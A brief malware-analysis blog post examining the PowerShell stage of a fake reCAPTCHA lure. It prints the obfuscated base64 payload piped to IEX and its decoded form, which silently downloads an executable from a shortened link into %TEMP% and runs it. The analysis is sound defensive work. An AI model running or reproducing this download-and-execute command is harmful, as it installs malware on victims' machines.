Analysis Fake reCAPTCHA ( Powershell Stage )

Hello friends, in this article we will talk about how to analyze a PowerShell code that is encoded and also taken from Fake Captcha. As mentioned in the previous article.

Read recent blog : https://reversethemalware.blogspot.com/2025/07/analysis-malicious-recaptcha.html

Malicious Powershell Code :

[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgJFByb2dyZXNzUHJlZmVyZW5jZT0nU2lsZW50bHlDb250aW51ZSc7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgInJlYnJhbmQubHkvb3BlbkNhcHRjaGEiIC1PdXRGaWxlICRlbnY6VEVNUFxLakdyeU5TdS5leGU7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRlbnY6VEVNUFxLakdyeU5TdS5leGU='))|I`e`X

Decoded Malicious Powershell Code ( CyberChef ) :

Decode Malicious Code :

powershell.exe -Command $ProgressPreference='SilentlyContinue'; Invoke-WebRequest -Uri "rebrand[.ly]/openCaptcha" -OutFile $env:TEMP\KjGryNSu.exe; Start-Process -FilePath $env:TEMP\KjGryNSu.exe

in this decoded malicious powershell code it start downloading silently this : KjGryNSu.exe . then start execution it from the dropped path from %TEMP% folder .